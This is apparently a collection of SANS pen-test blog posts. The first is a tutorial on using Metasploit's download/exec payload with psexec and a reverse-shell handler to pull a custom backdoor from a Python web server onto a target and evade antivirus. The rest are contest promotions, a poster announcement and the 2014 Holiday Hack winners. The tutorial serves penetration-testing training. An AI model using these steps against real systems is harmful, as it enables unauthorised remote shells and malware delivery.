Custom Payloads in Metasploit

[Editor’s Note: Mark Baggett shares some useful insights into delivering custom payloads using Metasploit, with a little Python magic to boot! –Ed.]

By Mark Baggett

You launch your Metasploit exploit.  It looks like it is working but no session is created. What happened?  Your exploit just got popped by antivirus software.  Such a bummer.  Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys.  The best way to avoid antivirus software is to stop using a payload that someone else created.  Time and time again, penetration testers find they have a basic need to use custom payloads.

Create your own custom payload, and then you won’t have to worry about an AV signature catching your payload and eating it!  It is easy and it gives you the flexibility to go after any target.  There are lots of tools and articles for helping you doing so, including the Veil framework.

So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it?  There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.

Metasploit’s Download/Exec Payload is a great option for delivering a custom payload to a target.  You can use it with most of Metasploit’s exploits including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC.  This flexibility means with this Metasploit payload, you can use your custom payload with the Meterpreter.

To use the Download/Exec payload, you will need to do three things.  First, you’ll need a website from which the victim can download your custom backdoor.  Second, you will need to setup a Metasploit handler to receive the connection from your custom backdoor.  Lastly, you’ll need an exploit to deliver your custom payload.  Let’s take a look at each of the steps.

1) A website to provide the “Download” in the Download/Exec payload

You have lots of options for a website to deliver you payloads.  Anytime I need a “quick and easy” website I use Python.  The first step to staring the Python web server is to change to the directory that contains the files you want to make available for download.  Then the command “python -m ‘SimpleHTTPServer’ <port number>” can be used to start a web server.  The files in that directory can then be downloaded using any web browser.  You can setup this server on any computer that has Python installed.  Here, I’ve started a web server listening on port 8000. When the exploit runs you’ll see the download being logged by your web server.  Here you can see the victim 10.1.1.170 downloading a copy of “pythonbackdoor.exe”.

Blog 1.1

2) Start a handler to receive your shell

Starting the multi/handler requires a few simple commands.  First is “use multi/handler”.  Next, set your payload to one that is compatible with the custom payload you created.  If your payload contains meterpreter then you will “set payload windows/meterpreter/reverse_tcp”.  If it is a command prompt then you would type “set payload windows/shell/reverse_tcp”.  Since my Python backdoor sends a command prompt, the correct payload here is “windows/shell/reverse_tcp”.  This “single” payload doesn’t use a stager and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” is expecting a connection from a stager not a shell.  Setting LHOST to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host.  This is a good shortcut from single payloads but it is not a good idea to use this for staged payloads.  Some stagers, for example /*/reverse_http, will require that you have an actual routed address so that the stager knows where to download the next stage.  Finally, set your LPORT to the port your custom payload is hardcoded to connect to.  In this example, my payload is set to send a command prompt to port 80.  Finally, you’ll need to start the multi-handler but our work in Metasploit is still not finished. You’ll also need to start your multi-handler as a background task. To do this, the “-j” options to the exploit command will start the multi-handler as a “job” that runs in the background.

Blog 2.1.1

 

3) Exploit the target and deliver the payload

With your handler in the background waiting to receive a connection, you’re ready to exploit the target.  Just about any exploit could be used, but remembering my Penetration Tester’s Pledge , I’ll use PSEXEC.  First, I use “windows/smb/psexec” and set it up with the correct username and password for the target.  Then I set my payload by typing “set PAYLOAD download/exec”.  The options are pretty simple. You set the URL to point to the custom payload on the web server that you setup in step 1.  You can change the name of the file that will be saved to the target if you like.

Blog 3.1.1

When you type “exploit” you will see it download from your website and a shell will appear in your handler.  Game On.  Let the pivots begin.

So now the question is do you have a custom payload to deliver to a target? If not, there are several options.  Veil is a great option.  It will create a customized version of meterpreter and it does an excellent job of avoiding antivirus software.  Or, you can write your own.

Want to be a certified Python Coder? Learn more: www.giac.org/gpyc

-Mark Baggett

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

EXTRA EXTRA! The New SANS Pen Test Poster

Extra! Extra! Read all about it! This week, many of you will be receiving our brand-spankin’ new SANS Pen Test Poster in the mail.  Please be on the lookout, because it’s got some really cool stuff on attack surfaces, tools, and techniques.  It’s included in the mailing with the SANS Security West brochure.

IMG_20150211_184232

The poster is chock full of some really nifty pen test advice from some of the best pen testers I know, including:

Tim Medin
Seth Misenar
Larry Pesce
Justin Searle
Steve Sims
John Strand
Josh Wright

The poster includes several sections.  On one side, we’ve got a description of the SANS Pen Test Coins (collect all eleven!), an overview of the SANS Pen Test Curriculum, and a super updated version of the Pen Test Practice Lab Mind Map created by Aman Hardikar .M, with pointers to all kinds of great exploitable distributions and “hack-this-site” targets for you to practice and build your skills.  Aman’s mind maps are simply fantastic.

2015 Poster Side 1

The reverse side includes a view of different attack surfaces in  a given example target enterprise, and all the different methods, tools, and techniques pen testers can apply against such target infrastructures.  We’ve got a couple of views of network pen testing, an approach to wireless pen testing, some web app pen testing details, and a really cool view of mobile device and infrastructure pen testing.  Each one provides a step-by-step approach to penetrating the target organization, with a list of each tool used along the way.

2015 Poster Side 2

So, you might be wondering… how can I get a poster?  Well, like I mentioned above, we’ve dropped them in the mail to many people along with the SANS Security West (San Diego) brochure.  If you don’t get one in the mail, we’ll have some on-hand at upcoming SANS events, and we’d be delighted to hand you one there.  Alternatively, if you can’t make it and just want to download a high-res copy, please click here.

If you want a printed version but didn’t receive one in the mail, please reach out to me in the comment section below, and I’ll be in touch.

I really do hope you enjoy the posters, and I’m really grateful for all the hard work of the   SANS Pen Test Instructor team who provided such great input on this one.

Have fun pen testing all the things!!!

Thank you–

–Ed.

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

2014 SANS Holiday Hack Winners and Official Answers

[Editor’s Note: Every year for eleven seasons now, SANS creates a Holiday Hack challenge for you to build your skills with real-world infosec tools and techniques, all the while having some good holiday-inspired fun, for everyone to participate in, no charge at all.  If you haven’t checked out our most recent SANS Holiday Hack Challenge, you should definitely read through it.  This years’ challenge was written by Ed Skoudis and Josh Wright, with support from Tom Hessman and the vocal stylings of James Lyne.  We’ll keep the challenge itself, the target servers, and the file system image available for as long as possible, so you can continue to work through it, either on your own, or referencing the official answers cited below.  Have fun!!!  Following immediately below is  our official announcement of winners and answers.  –Ed.]

Lynn Cratchit emerged from the rather toasty Secret Room, a gentle smile lighting up her countenance.

“Mr. Scrooge… have you finished judging this year’s SANS Holiday Hack Challenge entries?” she inquired.

A bedraggled Scrooge looked up wearily from his desk, surrounded by piles upon piles of papers stacked high all about. An increasingly healthy Tiny Tom looked upon the scene whilst holding an impossibly cute orphaned puppy, awaiting Scrooge’s answer.

The old man began to speak slowly, “All told, we received an avalanche of responses to our challenge, several hundred people from around the globe sending in their answers. Their response was both overwhelming and…” the old man paused… “Wonderful.” His eyes, I tell you, started to sparkle.

“I’m deeply touched by the outpouring of technical wizardry, analytical excellence, whimsical wit, and outright humor in these answers! Some were marvels of concision, while others were detailed treatises several dozen pages long. Many were straight arrow, while others plunged for the jugular of hilarity. Think about it! Those ghosts posed challenges from many different skill sets: social engineering, penetration testing, packet analysis, forensics analysis, and so much more! But, all in all, these very entries have shown beyond a doubt the great skill, extreme discipline, special patience, good will, and amazing character of people in our community. Why, one joker even posited this preposterous thing in his answers:

The characters in the story appear to be a loose portrayal of the staff of Counter Hack Challenges: Skoudis as Scrooge, Tom Hessman as Tiny Tom (rather than Tiny Tim), and Lynn Schifano as Mrs. Lynn Cratchit; and apparently, Ed keeps the secret room at the office a little cold for Lynn and Tom.”

“What nonsense!” laughed Cratchet, as  her new heater chugged away spreading its radiant warmth throughout the Secret Room.

After a hearty guffaw, Tiny Tom asked the most pertinent question, “So… do we have a winner, Dear Scrooge?”

“Why yes, we do! There were so many great entries. Behold, here are the lists of noteworthy responses and our winners.” Scrooge handed a scroll to Ms. Cratchit bearing the following proclamation….

Ebenezer Scrooge here… I’m delighted to announce this year’s honorable mentions and winners for the 2014 Holiday Hack Challenge, “A Christmas Hacking Carol.”

Honorable Mentions

All of these dear people correctly solved each challenge and recovered every one of the ghosts’ secrets. They are worthy of praise and have earned an honorable mention:

Anthony Canino Joshua Roark
Ben Allen Kerem Kocaer
Brad Berkemier Mark Elliott
Brian Boswell Mark Guth
Brian Wiltse Martin Tyrer
Bryan Rhodes Matt Edmondson
Bryan Smith Matt Keyser
Charles.L.Rice Michael Dyrmose
Chris Wallace Mohammed Faiz Ahmed Quadri
Christopher Dubsky Nick McKerrall
Dan Cândea Pgntest
Davide Berra Piotras
Dominick Barbuscio Richard Tafoya
Giacomo Milani Thomas Herrell
jane doe Tom Pohl
Johnny Medina Tyler Halfpop
Jon Searles Warren J Raquel
Joshua Roark Yassine id bougnoun
Kerem Kocaer

REALLY Honorable Mentions

In this next group, we have people whose answers included some extra special narrative or deep technical insights. These folks have earned a REALLY Honorable Mention:

Annah Waggoner Josh V
Anthony Magnus Lund Jacobsen
Austyn Krutsinger Mario Acosta Arteaga
Carrie Roberts Michael Pella
Chris Andre Solberg Dale Nick McKerrall
Christian Bajada Patrick Mooney
Delaney Ng Paul M. Goffar
Dinesh Peter Dayok
Eddy Vanlerberghe Richard Gold
Gebhard Zocher Rick El-Darwish
Harinderjeet Singh Ronnnie Friis Salomonsen
Ian Spyder Lovecraft Fabrizio
Jam4ar Tsvetelin Choranov
Jonas Strand

Stunning Awesomeness

This next group of answers exhibited simply stunning awesomeness. Each was a contender for the top slot, and it was a true honor  to read their answers.

Anatolie Prisacaru (shark0der): A wealth of technical insight in this one.  The Force is strong with its author, for sure!

Andrew Rowbotham: This solution is brilliantly laid-out and nicely detailed, with XKCD to boot!

Chris Eckert: This is a GREAT write-up, complete with hilarious memes from throughout the Internet… a pleasure to read and absorb.

Jeremy Galloway (Cypher G): The animation in this solution is infectious with excitement.  What a joy to read!

david switzer: Interested in some awesome rhyme, along with technical analysis?  You gotta check this one out then!

Don C. Weber: This report is stunningly good, a virtuoso performance with an impressive style and format for incident response, along with recommendations for preventing future occurrences of ghastly hacking interventions.

Jerome Kleinen: With its alternative ending, this solution makes for very fun and compelling reading.

Jim Herubin: What a GREAT, detailed, and well-formatted solution.  Nice work!

Joshua Tomkiel: This solution is smooth throughout, with a great description of each step, plus an excellent and clear format.

Rich Cassara: The 1940’s Private Eye Film Noir feel to this solution was awesome, bringing a smile. Plus, he re-imagined the entire point of the challenge, wherein a team tricks Scrooge through the use of an Oculus Rift, rather creative pharmacology, and even a trebuchet to simulate all of the ghastly action.  Simply amazing!

The Winners

And now… Our winners.

Random Draw

We’ll start with our Random Draw winner, who will receive an autographed copy of the Counter Hack Reloaded book.  Using a random number chosen by the fine folks at random.org, our winner is….

Matt Keyser

Most Creative Answer

Next up is our Most Creative Answer that is Technically Correct, who will also receive the Counter Hack Reloaded book. The winner for this one is a simply delightful and hilarious story full of Dr. Who and even some Star Wars references. We smiled and laughed our way through this great set of answers. It’s AWESOMELY creative!  And the winner is….

Mike Cecil

Best Technical Answer

Competition here was fierce, with so many strong contenders. But, in looking through them all, we received a very special entry that graphically illustrated the solution to each and every challenge, step-by-step with FANTASTIC  figures. If you’d like a quick and handy reference guide on how to conquer each challenge, you should definitely read this set of answers. Our best technical answer winner, who will also receive the Counter Hack Reloaded book, is….

Masashi Fujiwara

GRAND Prize Winner

And finally we have our GRAND Prize winner, who receives a free SANS OnDemand course. This entry covers each and every twist of the challenge and its solution, highlighting all of the subtleties that Josh Wright and Ed Skoudis buried in the challenge. In fact, the answer is so good that we consider it the OFFICIAL answer for this year’s SANS Holiday Hack challenge. If you are looking for how to conquer each and every one of the ghost’s secrets, we urge you to read the GRAND Prize winning answer by…

Dave Lassalle

Congrats to all our winners!scrooge

The entire team here wishes to thank everyone who worked through the challenge! Josh Wright, Tom Hessman, Lynn Schifano, Tim Medin, Jeff McJunkin, Tom VanNorman, and me (old Ebenezer Scrooge) are truly honored that you invest your time each year developing your skills and having fun with our quirky creations. For each Holiday Hack, we try to create a little Christmas world, distinct from each of our previous challenges with brand new technical twists, offering you an opportunity to dig in and develop real-world information skills based on very recent attacks, tools, and techniques. Our goal is to create the very best challenges we are able to muster to spread some unique holiday fun by varying the style, technical approach, tools, and techniques every year. Also, we leave our challenges up for as long as possible. Feel free to work through them again, or even go through our previous ones, such as our 2013 installment (It’s a Hackerful Life featuring attacks against Industrial Control Systems), 2012’s challenge (The Year without a Santa Hack, focussed on web app pen testing), or 2011’s missive (Grandma Got All Haxx0red by a Reindeer, chock full of in-depth packet analysis).

Oh, and one more thing… We’re already starting work on our 2015 challenge, our best ever, which will feature some really distinct delights, including some whacky wireless, a little firmware analysis, and an Internet-wide scavenger hunt for special stuff we’re going to squirrel away so that Santa himself couldn’t find it. We’ll launch it the second week of December, 2015.  I can’t wait!

–Eb.

Er… I mean…

–Ed.

 

p.s., If you like this kind of thing and want to build your skills through some excellent training, please do check out SANS course offerings, especially those in the Pen Test Curriculum.  We’ve got lotsa great in-depth offerings to choose from, including SANS Security 560 on Network Pen Testing (which I’m teaching in Feb in Scottsdale AZ, March in Baltimore, April in Orlando, and May in Austin TX), SANS Security 575 on Mobile Device Security & Pen Testing, and SANS Security 660 on Advanced Pen Testing!